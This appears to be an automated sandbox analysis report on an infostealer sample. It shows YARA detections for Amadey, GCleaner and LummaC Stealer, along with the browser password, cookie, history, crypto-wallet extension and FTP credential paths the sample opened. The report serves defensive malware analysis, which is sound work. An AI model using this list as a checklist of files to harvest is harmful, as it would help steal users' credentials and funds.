Source: 2ea5560900.exe, 0000000C.00000002.3834907815.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3765433231.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3772099152.0000000003654000.00000004.00000800.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3765433231.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000002.3834907815.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, 2ea5560900.exe, 0000000C.00000003.3765022408.000000000365C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 6.2.rapes.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wJWNpO6lcm.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.rapes.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rapes.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1446784481.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1414746165.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1439116662.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected GCleaner

Source: Yara match	File source: 14.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.da4a000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.dcf6000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.a99d155ba8.exe.dcf6000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.da1e000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.da80000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a99d155ba8.exe.db00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3842363077.000000000DA4A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3833830695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3843410151.000000000DD30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.3810839454.000000000DCE6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3842363077.000000000DA1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3842910350.000000000DB00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3842363077.000000000DA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3843410151.000000000DCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: 2ea5560900.exe PID: 3240, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 2ea5560900.exe, 0000000C.00000002.3835109078.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: 2ea5560900.exe, 0000000C.00000002.3835109078.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: 2ea5560900.exe, 0000000C.00000002.3835109078.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 2ea5560900.exe, 0000000C.00000002.3835109078.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"e
Source: 2ea5560900.exe, 0000000C.00000002.3835109078.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: 2ea5560900.exe, 0000000C.00000002.3835109078.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
